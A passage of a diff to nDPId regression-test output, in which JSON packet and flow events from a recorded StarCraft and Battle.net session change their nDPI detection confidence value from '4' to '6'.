{"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00946{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1437389963467,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":414,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":414,"pkt_l4_len":380,"thread_ts_msec":1437389963467,"pkt":"AQBef\/\/6hCYVPnXECABFAAGQAABAAAERxbzAqAH+7\/\/\/+pbNB2wBfPulTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTYwDQpsT0NBVElPTjogaHR0cDovLzE5Mi4xNjguMS4yNTQ6NTcwNTIvcm9vdERlc2MwLnhtbA0KU0VSVkVSOiBFUElDRU5UUk8gVVBuUC8xLjAgTWluaVVQblBkLzEuNg0KTlQ6IHVwbnA6cm9vdGRldmljZQ0KVVNOOiB1dWlkOjExMjY2NzM2LWZhNTktMTFlNC05YzlmLTg0MjYxNTNlNzVjNDo6dXBucDpyb290ZGV2aWNlDQpOVFM6IHNzZHA6YWxpdmUNCk9QVDogImh0dHA6Ly9zY2hlbWFzLnVwbnAub3JnL3VwbnAvMS8wLyI7DQowMS1OTFM6IDENCkJPT1RJRC5VUE5QLk9SRzogMQ0KQ09ORklHSUQuVVBOUC5PUkc6IDEzMzcNCg0K"} 00958{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1437389963467,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":423,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":423,"pkt_l4_len":389,"thread_ts_msec":1437389963467,"pkt":"AQBef\/\/6hCYVPnXECABFAAGZAABAAAERxbPAqAH+7\/\/\/+pbNB2wBhW9zTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTYwDQpsT0NBVElPTjogaHR0cDovLzE5Mi4xNjguMS4yNTQ6NTcwNTIvcm9vdERlc2MwLnhtbA0KU0VSVkVSOiBFUElDRU5UUk8gVVBuUC8xLjAgTWluaVVQblBkLzEuNg0KTlQ6IHV1aWQ6MTEyNjY3MzYtZmE1OS0xMWU0LTljOWYtODQyNjE1M2U3NWM0DQpVU046IHV1aWQ6MTEyNjY3MzYtZmE1OS0xMWU0LTljOWYtODQyNjE1M2U3NWM0DQpOVFM6IHNzZHA6YWxpdmUNCk9QVDogImh0dHA6Ly9zY2hlbWFzLnVwbnAub3JnL3VwbnAvMS8wLyI7DQowMS1OTFM6IDENCkJPT1RJRC5VUE5QLk9SRzogMQ0KQ09ORklHSUQuVVBOUC5PUkc6IDEzMzcNCg0K"} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1437389964511,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437389964511,"pkt":"hCYVPnXEIImEa8W6CABFAAA8SKZAAIAGzljAqAFkUO\/QwQ1jBF+OUzh85cVUn1AY+eiiKgAAgb8pIAfuTigNRzF0YIhRn73AbVc="} @@ -60,24 +60,24 @@ 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1437389964518,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389964518,"pkt":"hCYVPnXEIImEa8W6CABFAAA0bDFAAIAGrOPAqAFkrcJx4A2yAFD3XxLXAAAAAIACIABVKAAAAgQFtAEDAwgBAQQC"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1437389964552,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389964552,"pkt":"IImEa8W6hCYVPnXECABFAAA0QI0AADUGY4itwnHgwKgBZABQDbI8Bg5O918S2IASp5SDTQAAAgQFlgEBBAIBAwMH"} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1437389964552,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389964552,"pkt":"hCYVPnXEIImEa8W6CABFAAAobDJAAIAGrO7AqAFkrcJx4A2yAFD3XxLYPAYOT1AQAQBqlgAA"} -00819{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389964518,"flow_last_seen":1437389964552,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":350,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1437389964552,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3506,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"},"http": {"hostname":"www.google-analytics.com","url":"www.google-analytics.com\/collect","code":0,"content_type":"","user_agent":"Battle.net\/1.3.0.5952"}} +00819{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389964518,"flow_last_seen":1437389964552,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":350,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1437389964552,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3506,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"},"http": {"hostname":"www.google-analytics.com","url":"www.google-analytics.com\/collect","code":0,"content_type":"","user_agent":"Battle.net\/1.3.0.5952"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389964752,"flow_last_seen":1437389964752,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1437389964752,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1437389964752,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1437389964752,"pkt":"hCYVPnXEIImEa8W6CABFAAA\/X2UAAIARVpbAqAFkwKgB\/up6ADUAK3heAXYBAAABAAAAAAAABGxsbncIYmxpenphcmQDY29tAAABAAE="} -00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389964752,"flow_last_seen":1437389964752,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1437389964752,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"llnw.blizzard.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389964752,"flow_last_seen":1437389964752,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1437389964752,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"llnw.blizzard.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1437389964783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1437389964783,"pkt":"hCYVPnXEIImEa8W6CABFAAA\/X2YAAIARVpXAqAFkwKgB\/up6ADUAK3heAXYBAAABAAAAAAAABGxsbncIYmxpenphcmQDY29tAAABAAE="} 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1437389964788,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":144,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":144,"pkt_l4_len":110,"thread_ts_msec":1437389964788,"pkt":"IImEa8W6hCYVPnXECABFAACCAABAAEARtbjAqAH+wKgBZAA16noAbnPyAXaBgAABAAMAAAAABGxsbncIYmxpenphcmQDY29tAAABAAHADAAFAAEAAFQfABcIYmxpenphcmQCdm8FbGxud2QDbmV0AMAvAAEAAQAAATwABFf43f7ALwABAAEAAAE8AARX+N39"} -01037{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389964752,"flow_last_seen":1437389964788,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1437389964788,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"llnw.blizzard.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"87.248.221.254"}} +01037{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389964752,"flow_last_seen":1437389964788,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1437389964788,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"llnw.blizzard.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"87.248.221.254"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389964790,"flow_last_seen":1437389964790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389964790,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1437389964790,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389964790,"pkt":"hCYVPnXEIImEa8W6CABFAAA0FwlAAIAG67fAqAFkV\/jd\/g20AFApaAewAAAAAIAC\/\/838QAAAgQFtAEDAwgBAQQC"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1437389964848,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389964848,"pkt":"IImEa8W6hCYVPnXECABFAAA0tGpAAPUG2VVX+N3+wKgBZABQDbTA0NjuKWgHsYAS\/\/+fJQAAAgQFtAEDAwQEAgAA"} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1437389964848,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389964848,"pkt":"hCYVPnXEIImEa8W6CABFAAAoFwpAAIAG68LAqAFkV\/jd\/g20AFApaAexwNDY71AQBADa8wAA"} -00998{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389964790,"flow_last_seen":1437389964848,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1437389964848,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"llnw.blizzard.com","url":"llnw.blizzard.com\/sc2-pod-retail\/AF11CD00\/EU\/24621.direct\/s2-36281-BA356DD57557728843CAF63A12C79AA3.mfil","code":0,"content_type":"","user_agent":"Blizzard Web Client"}} -01150{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437389964790,"flow_last_seen":1437389964921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1647,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1437389964921,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"llnw.blizzard.com","url":"llnw.blizzard.com\/sc2-pod-retail\/AF11CD00\/EU\/24621.direct\/s2-36281-BA356DD57557728843CAF63A12C79AA3.mfil","code":200,"content_type":"application\/octet-stream","user_agent":"Blizzard Web Client"}} +00998{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389964790,"flow_last_seen":1437389964848,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1437389964848,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"llnw.blizzard.com","url":"llnw.blizzard.com\/sc2-pod-retail\/AF11CD00\/EU\/24621.direct\/s2-36281-BA356DD57557728843CAF63A12C79AA3.mfil","code":0,"content_type":"","user_agent":"Blizzard Web Client"}} +01150{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437389964790,"flow_last_seen":1437389964921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1647,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1437389964921,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"llnw.blizzard.com","url":"llnw.blizzard.com\/sc2-pod-retail\/AF11CD00\/EU\/24621.direct\/s2-36281-BA356DD57557728843CAF63A12C79AA3.mfil","code":200,"content_type":"application\/octet-stream","user_agent":"Blizzard Web Client"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389967432,"flow_last_seen":1437389967432,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389967432,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1437389967432,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389967432,"pkt":"hCYVPnXEIImEa8W6CABFAAA0U2dAAIAG+pjAqAFkDIHeNg24AFDXJA2NAAAAAIACIACvkgAAAgQFtAEDAwgBAQQC"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1437389967630,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389967630,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAAC0GoQAMgd42wKgBZABQDbj6JMXG1yQNjoASFtD4xgAAAgQFtAEBBAIBAwMH"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1437389967630,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389967630,"pkt":"hCYVPnXEIImEa8W6CABFAAAoU2hAAIAG+qPAqAFkDIHeNg24AFDXJA2O+iTFx1AQAQBPaQAA"} -00806{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389967432,"flow_last_seen":1437389967639,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1437389967639,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"},"http": {"hostname":"us.scan.worldofwarcraft.com","url":"us.scan.worldofwarcraft.com\/update\/Launcher.txt","code":0,"content_type":"","user_agent":""}} +00806{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389967432,"flow_last_seen":1437389967639,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1437389967639,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"},"http": {"hostname":"us.scan.worldofwarcraft.com","url":"us.scan.worldofwarcraft.com\/update\/Launcher.txt","code":0,"content_type":"","user_agent":""}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":245,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968486,"flow_last_seen":1437389968486,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968486,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":245,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1437389968486,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968486,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaD9AAIAGnzjAqAFkAuQuaA2kAbvjTIWjXKb5cVARAQDtEwAA"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":246,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3489,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -99,54 +99,54 @@ 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968488,"flow_last_seen":1437389968488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968488,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3484,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1437389968488,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968488,"pkt":"hCYVPnXEIImEa8W6CABFAAAobDZAAIAGrOrAqAFkrcJx4A2cAbsxkmlKz83WwVARAP18ZAAA"} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968519,"pkt":"IImEa8W6hCYVPnXECABFAABdOZFAADkGFKgC5C5ywKgBZAG7DZol2NSj+KyQXlAYAk8nagAAFQMCADAMud3SaYTsSqa\/uoo0a5E8VCc4Xkt3IWOikvjNzbZ6\/KN17SBOZ1wiAn+Wb8fZvA4="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968519,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3482,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968519,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3482,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 